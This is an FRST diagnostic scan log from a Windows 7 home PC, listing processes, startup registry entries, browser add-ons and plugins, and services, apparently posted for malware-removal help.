Ran by KEKLR (administrator) on KEKLR-PC (11-04-2017 17:40:42)
Running from C:\Users\KEKLR\Desktop
Loaded Profiles: KEKLR (Available Profiles: KEKLR)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_960c1f056a541068\stacsv64.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Andrea Electronics Corporation) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_960c1f056a541068\AESTSr64.exe
(LSI Corporation) C:\Program Files\LSI SoftModem\agr64svc.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
(SEIKO EPSON CORPORATION) C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe
(Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(SEIKO EPSON CORPORATION) C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S60RPB.EXE
(Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe
(CyberLink) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe
(CyberLink Corp.) C:\Program Files (x86)\Hewlett-Packard\Media\Live TV\TVAgent.exe
(CyberLink Corp.) C:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
() C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAAnotif.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE
(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_YATIKEE.EXE
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
() C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Windows\System32\FXSSVC.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
( Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\QLBCtrl.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\concentr.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\redirector.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\Receiver\Receiver.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\EPSON Software\FAX Utility\FUFAXRCV.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\Com4QLBEx.exe
() C:\Program Files (x86)\Hewlett-Packard\Shared\HpqToaster.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\SelfServicePlugin\SelfServicePlugin.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\ICA Client\wfcrun32.exe
(HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\AuthManager\AuthManSvr.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
(Microsoft Corporation) C:\Windows\splwow64.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Google Inc.) C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil64_25_0_0_127_ActiveX.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Microsoft Corporation) C:\Windows\System32\prevhost.exe
(Microsoft Corporation) C:\Windows\System32\MsSpellCheckingFacility.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2837288 2011-10-14] (Synaptics Incorporated)
HKLM\...\Run: [SmartMenu] => C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe [610872 2009-07-21] ()
HKLM\...\Run: [IAAnotif] => C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\iaanotif.exe [186904 2009-06-04] (Intel Corporation)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [487424 2010-03-23] (IDT, Inc.)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1353680 2016-11-14] (Microsoft Corporation)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM-x32\...\Run: [HPCam_Menu] => c:\Program Files (x86)\Hewlett-Packard\Media\Webcam\MUITransfer\MUIStartMenu.exe [218408 2009-02-25] (CyberLink Corp.)
HKLM-x32\...\Run: [QlbCtrl.exe] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe [323640 2009-11-24] ( Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [UpdatePRCShortCut] => C:\Program Files (x86)\Hewlett-Packard\Recovery\MUITransfer\MUIStartMenu.exe [222504 2009-05-20] (CyberLink Corp.)
HKLM-x32\...\Run: [WirelessAssistant] => C:\Program Files (x86)\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe [498744 2009-07-23] (Hewlett-Packard)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [ConnectionCenter] => C:\Program Files (x86)\Citrix\ICA Client\concentr.exe [518496 2015-06-24] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [Redirector] => C:\Program Files (x86)\Citrix\ICA Client\redirector.exe [231776 2015-06-24] (Citrix Systems, Inc.)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [FUFAXRCV] => C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXRCV.exe [653352 2017-02-16] (SEIKO EPSON CORPORATION)
HKLM-x32\...\Run: [FUFAXSTM] => C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe [862248 2017-02-16] (SEIKO EPSON CORPORATION)
HKLM-x32\...\Run: [EEventManager] => C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [1087184 2016-01-20] (SEIKO EPSON CORPORATION)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Run: [HPADVISOR] => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe [1689144 2010-06-30] (Hewlett-Packard)
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Run: [LightScribe Control Panel] => C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe [2363392 2009-11-20] (Hewlett-Packard Company)
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2010-01-16] (Google Inc.)
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Run: [OfficeSyncProcess] => C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE [721504 2015-09-02] (Microsoft Corporation)
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\...\Run: [EPLTarget\P0000000000000000] => C:\Windows\system32\spool\DRIVERS\x64\3\E_YATIKEE.EXE [298560 2013-09-12] (SEIKO EPSON CORPORATION)
HKU\S-1-5-18\...\Run: [KSS] => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe [919296 2015-06-03] (Kaspersky Lab ZAO)
HKU\S-1-5-18\...A8F59079A8D5}\localserver32:  <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 204.186.80.229 204.186.110.114 204.186.0.180
Tcpip\..\Interfaces\{AFE4A105-7E52-4CB0-9CAE-18A1828C5361}: [DhcpNameServer] 204.186.80.229 204.186.110.114 204.186.0.180

Internet Explorer:
==================
HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com/food
SearchScopes: HKLM -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKLM -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKLM-x32 -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKLM-x32 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2017-03-05] (Microsoft Corporation)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-05-02] (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\URLREDIR.DLL [2017-03-05] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2017-03-05] (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2016-07-21] (HP Inc.)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2017-03-05] (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\ssv.dll [2015-04-25] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-05-02] (Google Inc.)
BHO-x32: hpBHO Class -> {ABD3B5E1-B268-407B-A150-2641DAB8D898} -> C:\Program Files (x86)\Common Files\Homepage Protection\HomepageProtection.dll [2009-06-08] (AOL Products)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\URLREDIR.DLL [2017-03-05] (Microsoft Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2017-03-05] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\jp2ssv.dll [2015-04-25] (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2016-07-21] (HP Inc.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-05-02] (Google Inc.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-05-02] (Google Inc.)
Toolbar: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-05-02] (Google Inc.)
DPF: HKLM-x32 {02BCC737-B171-4746-94C9-0D8A0B2C0089} hxxp://office.microsoft.com/sites/production/ieawsdc32.cab
DPF: HKLM-x32 {166B1BCA-3F9C-11CF-8075-444553540000} hxxp://fpdownload.macromedia.com/get/shockwave/cabs/director/sw.cab
DPF: HKLM-x32 {17492023-C23A-453E-A040-C7C580BBF700} hxxp://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab
DPF: HKLM-x32 {3860DD98-0549-4D50-AA72-5D17D200EE10} hxxp://cdn.scan.onecare.live.com/resource/download/scanner/en-us/wlscctrl2.cab
DPF: HKLM-x32 {3D3B42C2-11BF-4732-A304-A01384B70D68} hxxp://picasaweb.google.com/s/v/60.08/uploader2.cab
DPF: HKLM-x32 {4B54A9DE-EF1C-4EBE-A328-7C28EA3B433A} hxxp://quickscan.bitdefender.com/qsax/qsax.cab
DPF: HKLM-x32 {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} hxxp://download.bitdefender.com/resources/scanner/sources/en/scan8/oscan8.cab
DPF: HKLM-x32 {644E432F-49D3-41A1-8DD5-E099162EEEC5} hxxp://security.symantec.com/sscv6/SharedContent/common/bin/cabsa.cab
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} hxxp://download.eset.com/special/eos/OnlineScanner.cab
DPF: HKLM-x32 {9191F686-7F0A-441D-8A98-2FE3AC1BD913} hxxp://acs.pandasoftware.com/activescan/cabs/as2stubie.cab
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler-x32: lbxfile - {56831180-F115-11d2-B6AA-00104B2B9943} - C:\Program Files (x86)\Libronix DLS\System\FileProt.dll [2002-08-05] (Libronix Corporation)
Handler-x32: lbxres - {24508F1B-9E94-40EE-9759-9AF5795ADF52} - C:\Program Files (x86)\Libronix DLS\System\ResProt.dll [2002-08-05] (Libronix Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-05] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-05] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-05] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-03-05] (Microsoft Corporation)
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2015-06-24] (Citrix Systems, Inc.)

FireFox:
========
FF ProfilePath: C:\Users\KEKLR\AppData\Roaming\Mozilla\Firefox\Profiles\rtqcgnqa.default [2017-04-09]
FF Homepage: Mozilla\Firefox\Profiles\rtqcgnqa.default -> hxxps://login.yahoo.com/config/login_verify2?&.src=ym&rl=1
FF Extension: (HP Detect) - C:\Users\KEKLR\AppData\Roaming\Mozilla\Firefox\Profiles\rtqcgnqa.default\Extensions\{ab91efd4-6975-4081-8552-1b3922ed79e2} [2012-12-08] [not signed]
FF Extension: (Site Deployment Checker) - C:\Users\KEKLR\AppData\Roaming\Mozilla\Firefox\Profiles\rtqcgnqa.default\features\{61e6cfb8-2aca-4f3a-92fd-7275f8f7e100}\deployment-checker@mozilla.org.xpi [2017-04-03]
FF Extension: (Disable Prefetch) - C:\Users\KEKLR\AppData\Roaming\Mozilla\Firefox\Profiles\rtqcgnqa.default\features\{61e6cfb8-2aca-4f3a-92fd-7275f8f7e100}\disable-prefetch@mozilla.org.xpi [2017-04-03]
FF Extension: (Site Deployment Checker) - C:\Program Files (x86)\Mozilla Firefox\browser\features\deployment-checker@mozilla.org.xpi [2017-04-01] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_127.dll [2017-03-14] ()
FF Plugin: @java.com/DTPlugin,version=10.6.2 -> C:\Windows\system32\npDeployJava1.dll [2012-08-29] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50905.0\npctrl.dll [2017-02-10] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_127.dll [2017-03-14] ()
FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll [2015-06-24] (Citrix Systems, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.45.2 -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\dtplugin\npDeployJava1.dll [2015-04-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.45.2 -> C:\Program Files (x86)\Java\jre1.8.0_45\bin\plugin2\npjp2.dll [2015-04-25] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2017-03-05] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50905.0\npctrl.dll [2017-02-10] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-03-05] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @pandasecurity.com/activescan -> C:\Program Files (x86)\Panda Security\ActiveScan 2.0\npwrapper.dll [2010-07-27] (Panda Security, S.L.)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-17] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-17] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-04] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3698744866-2675293530-421701469-1001: @facebook.com/FBPlugin,version=1.0.3 -> C:\Users\KEKLR\AppData\Roaming\Facebook\npfbplugin_1_0_3.dll [2010-06-09] ( )
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2017-04-04] (Adobe Systems Inc.)

Chrome:
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> hxxp://www.google.com
CHR StartupUrls: Default -> "hxxp://www.google.com"
CHR Profile: C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default [2017-04-09]
CHR HKLM-x32\...\Chrome\Extension: [jkfpchpiljkaemlpmpebnglgkomamfeo] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AESTFilters; C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_960c1f056a541068\AESTSr64.exe [89600 2009-03-02] (Andrea Electronics Corporation)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3737792 2017-03-26] (Microsoft Corporation)
R2 EpsonCustomerResearchParticipation; C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe [677376 2016-08-02] (SEIKO EPSON CORPORATION)
R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [144560 2012-05-17] (Seiko Epson Corporation)
R2 EPSON_PM_RPCV4_06; C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S60RPB.EXE [152640 2013-04-15] (SEIKO EPSON CORPORATION)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [31776 2016-12-07] (HP Inc.)
R2 kss; C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe [919296 2015-06-03] (Kaspersky Lab ZAO)
R2 LightScribeService; C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2009-11-20] (Hewlett-Packard Company) [File not signed]
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [119864 2016-11-14] (Microsoft Corporation)
S2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2008-12-03] (Hewlett-Packard) [File not signed]
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-11-14] (Microsoft Corporation)
S3 ose; C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE [198192 2017-03-25] (Microsoft Corporation) [File not signed]
S2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2008-12-03] (Hewlett-Packard) [File not signed]
R2 RichVideo; C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe [247152 2009-01-21] ()
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
R2 STacSV; C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_960c1f056a541068\STacSV64.exe [247808 2010-03-23] (IDT, Inc.)
